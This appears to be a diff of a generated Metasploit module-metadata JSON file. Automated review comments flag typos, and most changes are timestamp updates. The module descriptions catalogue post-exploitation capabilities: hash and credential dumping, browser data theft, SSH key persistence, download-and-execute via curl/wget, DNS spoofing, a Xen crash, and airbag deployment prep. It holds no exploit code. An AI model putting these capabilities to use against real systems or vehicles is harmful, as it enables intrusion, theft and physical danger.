"description": "Post Module to dump the password hashes for Android System. Root is required.\n To perform this operation, two things are needed. First, a password.key file\n is required as this contains the hash but no salt. Next, a sqlite3 database\n is needed (with supporting files) to pull the salt from. Combined, this\n creates the hash we need. Samsung based devices change the hash slightly.",
"references": [
"URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
"URL-https://hashcat.net/forum/thread-2202.html"
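Review bot: the description in this hunk is identical before and after in this view, so the change is whitespace-only; while the module text is being regenerated, `Samsung based devices` should be hyphenated as `Samsung-based devices`, and `Post Module` does not need capitals. Fix in the module source, not in this generated file.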
@@ -205379,7 +207734,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-18 08:47:24 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "android/gather/hashdump",
@@ -205416,7 +207771,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-01 16:54:46 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/gather/sub_info.rb",
"is_install_path": true,
"ref_name": "android/gather/sub_info",
@@ -205454,7 +207809,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-06 17:37:12 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/gather/wireless_ap.rb",
"is_install_path": true,
"ref_name": "android/gather/wireless_ap",
@@ -205493,7 +207848,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/android/local/koffee.rb",
"is_install_path": true,
"ref_name": "android/local/koffee",
@@ -205501,6 +207856,17 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"screen-effects",
"config-changes",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"meterpreter"
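Review bot: the `notes` block added here for `android/local/koffee` declares `config-changes` and `screen-effects` but leaves `Reliability` empty; an empty `Reliability` is acceptable for a post module that does not yield a session, but with `config-changes` declared the module documentation should say what it changes on the target and whether that is reverted, since nothing in this entry indicates cleanup.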
@@ -205532,7 +207898,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/manage/remove_lock.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock",
@@ -205569,7 +207935,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/android/manage/remove_lock_root.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock_root",
@@ -205606,7 +207972,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/apple_ios/gather/ios_image_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_image_gather",
@@ -205632,7 +207998,7 @@
"author": [
"Shelby Pace"
],
"description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.",
"description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.",
"references": [
],
@@ -205642,7 +208008,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-02 08:01:15 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/apple_ios/gather/ios_text_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_text_gather",
@@ -205678,7 +208044,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-13 10:13:27 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/bsd/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "bsd/gather/hashdump",
@@ -205715,7 +208081,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/firefox/gather/cookies.rb",
"is_install_path": true,
"ref_name": "firefox/gather/cookies",
@@ -205741,7 +208107,7 @@
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of the entire browser history from a Firefox\n Privileged Javascript Shell.",
"description": "This module allows collection of the entire browser history from a Firefox\n Privileged Javascript Shell.",
"references": [
],
@@ -205751,7 +208117,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/firefox/gather/history.rb",
"is_install_path": true,
"ref_name": "firefox/gather/history",
@@ -205787,7 +208153,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/firefox/gather/passwords.rb",
"is_install_path": true,
"ref_name": "firefox/gather/passwords",
@@ -205813,7 +208179,7 @@
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.",
"description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.",
"references": [
],
@@ -205823,7 +208189,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/firefox/gather/xss.rb",
"is_install_path": true,
"ref_name": "firefox/gather/xss",
@@ -205859,7 +208225,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/firefox/manage/webcam_chat.rb",
"is_install_path": true,
"ref_name": "firefox/manage/webcam_chat",
@@ -205895,7 +208261,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-01 12:04:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/can_flood.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/can_flood",
@@ -205921,7 +208287,7 @@
"author": [
"Craig Smith"
],
"description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.",
"description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.",
"references": [
],
@@ -205931,7 +208297,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/canprobe.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/canprobe",
@@ -206047,7 +208413,7 @@
"author": [
"Craig Smith"
],
"description": "Post Module to query DTCs, Some common engine info and Vehicle Info.\n It returns such things as engine speed, coolant temp, Diagnostic\n Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc",
"description": "Post Module to query DTCs, Some common engine info and Vehicle Info.\n It returns such things as engine speed, coolant temp, Diagnostic\n Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc",
"references": [
],
@@ -206057,7 +208423,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/getvinfo.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/getvinfo",
@@ -206093,7 +208459,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/identifymodules.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/identifymodules",
@@ -206129,7 +208495,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/malibu_overheat.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/malibu_overheat",
@@ -206165,7 +208531,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-09-13 09:32:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/mazda_ic_mover.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/mazda_ic_mover",
@@ -206193,7 +208559,7 @@
"Juergen Duerrwang",
"Craig Smith"
],
"description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
"description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
"references": [
"CVE-2017-14937",
"URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts"
@@ -206204,7 +208570,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/automotive/pdt.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/pdt",
@@ -206230,7 +208596,7 @@
"author": [
"Craig Smith"
],
"description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.\n (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
"description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.\n (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
"references": [
],
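Review bot: the `description` carried in this hunk still spells `RFTranscievers` (for `RFTransceivers`); since this JSON is regenerated from the module source, the spelling fix belongs in the module's description text rather than in this generated file, otherwise the next automatic update will reintroduce it.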
@@ -206240,7 +208606,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/rftransceiver/rfpwnon.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/rfpwnon",
@@ -206266,7 +208632,7 @@
"author": [
"Craig Smith"
],
"description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.",
"description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.",
"references": [
"URL-https://github.com/AndrewMohawk/RfCatHelpers"
],
@@ -206276,7 +208642,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/rftransceiver/transmitter.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/transmitter",
@@ -206302,7 +208668,7 @@
"author": [
"Craig Smith"
],
"description": "Post Module to send beacon signals to the broadcast address while\n channel hopping",
"description": "Post Module to send beacon signals to the broadcast address while\n channel hopping",
"references": [
],
@@ -206312,7 +208678,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/hardware/zigbee/zstumbler.rb",
"is_install_path": true,
"ref_name": "hardware/zigbee/zstumbler",
@@ -206348,7 +208714,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/enum_connections.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_connections",
@@ -206384,7 +208750,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/enum_hosts.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_hosts",
@@ -206420,7 +208786,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/jailbreak.rb",
"is_install_path": true,
"ref_name": "linux/busybox/jailbreak",
@@ -206456,7 +208822,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/ping_net.rb",
"is_install_path": true,
"ref_name": "linux/busybox/ping_net",
@@ -206492,7 +208858,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/set_dmz.rb",
"is_install_path": true,
"ref_name": "linux/busybox/set_dmz",
@@ -206528,7 +208894,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/set_dns.rb",
"is_install_path": true,
"ref_name": "linux/busybox/set_dns",
@@ -206564,7 +208930,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/smb_share_root.rb",
"is_install_path": true,
"ref_name": "linux/busybox/smb_share_root",
@@ -206600,7 +208966,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/busybox/wget_exec.rb",
"is_install_path": true,
"ref_name": "linux/busybox/wget_exec",
@@ -206627,7 +208993,7 @@
"Christoph Sendner <christoph.sendner@stud-mail.uni-wuerzburg.de>",
"Aleksandar Milenkoski <aleksandar.milenkoski@uni-wuerzburg.de>"
],
"description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.",
"description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.",
"references": [
"CVE-2012-5525"
],
@@ -206637,7 +209003,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-09-24 13:51:54 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/dos/xen_420_dos.rb",
"is_install_path": true,
"ref_name": "linux/dos/xen_420_dos",
@@ -206673,7 +209039,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-06 00:46:09 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/checkcontainer.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkcontainer",
@@ -206710,7 +209076,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-05-23 13:16:22 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "linux/gather/checkvm",
@@ -206737,7 +209103,7 @@
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
"description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".",
"references": [
],
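Review bot: the `description` in this hunk refers to users' `.ecrypts` directories while the module is `linux/gather/ecryptfs_creds`; this looks like a typo for `.ecryptfs` and should be corrected in the module source so the regenerated metadata picks it up.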
@@ -206747,7 +209113,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/ecryptfs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/ecryptfs_creds",
@@ -206819,7 +209185,7 @@
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.",
"description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.",
"references": [
],
@@ -206829,7 +209195,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-06 13:06:50 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_configs.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_configs",
@@ -206866,7 +209232,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-11 17:23:44 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/linux/gather/enum_containers.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_containers",
@@ -206874,6 +209240,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell",
@@ -206893,7 +209268,7 @@
"author": [
"Cale Smith"
],
"description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.",
"description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.",
"references": [
],
@@ -206903,7 +209278,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_nagios_xi.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_nagios_xi",
@@ -206941,7 +209316,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-21 00:46:44 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_network.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_network",
@@ -206968,7 +209343,7 @@
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.",
"description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.",
"references": [
],
@@ -206978,7 +209353,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-04-26 21:26:52 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_protections.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_protections",
@@ -207055,7 +209430,7 @@
"ohdae <bindshell@live.com>",
"Roberto Espreto <robertoespreto@gmail.com>"
],
"description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs",
"description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs",
"references": [
],
@@ -207065,7 +209440,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-01 14:56:28 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_system.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_system",
@@ -207092,7 +209467,7 @@
"author": [
"ohdae <bindshell@live.com>"
],
"description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.",
"description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.",
"references": [
],
@@ -207102,7 +209477,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/enum_users_history.rb",
"is_install_path": true,
"ref_name": "linux/gather/enum_users_history",
@@ -207187,7 +209562,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/gnome_commander_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_commander_creds",
@@ -207224,7 +209599,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-09-08 21:56:02 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/gnome_keyring_dump.rb",
"is_install_path": true,
"ref_name": "linux/gather/gnome_keyring_dump",
@@ -207263,7 +209638,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-04-09 13:23:05 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/post/linux/gather/haserl_read.rb",
"is_install_path": true,
"ref_name": "linux/gather/haserl_read",
@@ -207271,6 +209646,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": [
"shell",
@@ -207300,7 +209684,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-10-13 10:13:27 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "linux/gather/hashdump",
@@ -207427,7 +209811,7 @@
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.",
"description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.",
"references": [
],
@@ -207437,7 +209821,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-29 22:34:38 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/mount_cifs_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/mount_cifs_creds",
@@ -207465,7 +209849,7 @@
"rvrsh3ll",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.",
"description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.",
"references": [
"URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
],
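Review bot: the `description` in this hunk reads "This module grab OpenVPN credentials"; the verb should be "grabs", and the fix belongs in the module's own description text since this file is generated from it.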
@@ -207475,7 +209859,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/openvpn_credentials.rb",
"is_install_path": true,
"ref_name": "linux/gather/openvpn_credentials",
@@ -207513,7 +209897,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-07 11:13:09 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb",
"is_install_path": true,
"ref_name": "linux/gather/phpmyadmin_credsteal",
@@ -207539,7 +209923,7 @@
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.",
"description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.",
"references": [
],
@@ -207549,7 +209933,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-06-01 21:33:33 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/pptpd_chap_secrets.rb",
"is_install_path": true,
"ref_name": "linux/gather/pptpd_chap_secrets",
@@ -207576,7 +209960,7 @@
"author": [
"Harvey Phillips <xcellerator@gmx.com>"
],
"description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.",
"description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.",
"references": [
],
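Review bot: the `description` in this hunk reads "collects the hostnames name and private keys"; the stray "name" should be dropped ("collects the hostnames and private keys"), and the fix belongs in the module source rather than this generated JSON.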
@@ -207586,7 +209970,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-22 11:55:47 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/gather/tor_hiddenservices.rb",
"is_install_path": true,
"ref_name": "linux/gather/tor_hiddenservices",
@@ -207674,7 +210058,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/manage/dns_spoofing.rb",
"is_install_path": true,
"ref_name": "linux/manage/dns_spoofing",
@@ -207701,7 +210085,7 @@
"author": [
"Joshua D. Abraham <jabra@praetorian.com>"
],
"description": "This module downloads and runs a file with bash. It first tries to uses curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.",
"description": "This module downloads and runs a file with bash. It first tries to uses curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.",
"references": [
],
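Review bot: the `description` in this hunk reads "It first tries to uses curl"; this should be "tries to use curl", and the correction belongs in the module's description text so the regenerated metadata reflects it.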
@@ -207711,7 +210095,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/manage/download_exec.rb",
"is_install_path": true,
"ref_name": "linux/manage/download_exec",
@@ -207785,7 +210169,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/manage/iptables_removal.rb",
"is_install_path": true,
"ref_name": "linux/manage/iptables_removal",
@@ -207822,7 +210206,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-24 11:22:19 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/manage/pseudo_shell.rb",
"is_install_path": true,
"ref_name": "linux/manage/pseudo_shell",
@@ -207859,7 +210243,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/linux/manage/sshkey_persistence.rb",
"is_install_path": true,
"ref_name": "linux/manage/sshkey_persistence",
@@ -207897,7 +210281,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-11-22 14:11:03 +0000",
"mod_time": "2023-02-08 13:47:34 +0000",
"path": "/modules/post/multi/escalate/aws_create_iam_user.rb",
"is_install_path": true,
"ref_name": "multi/escalate/aws_create_iam_user",
@@ -207925,7 +210309,7 @@
"Jann Horn",
"joev <joev@metasploit.com>"
],
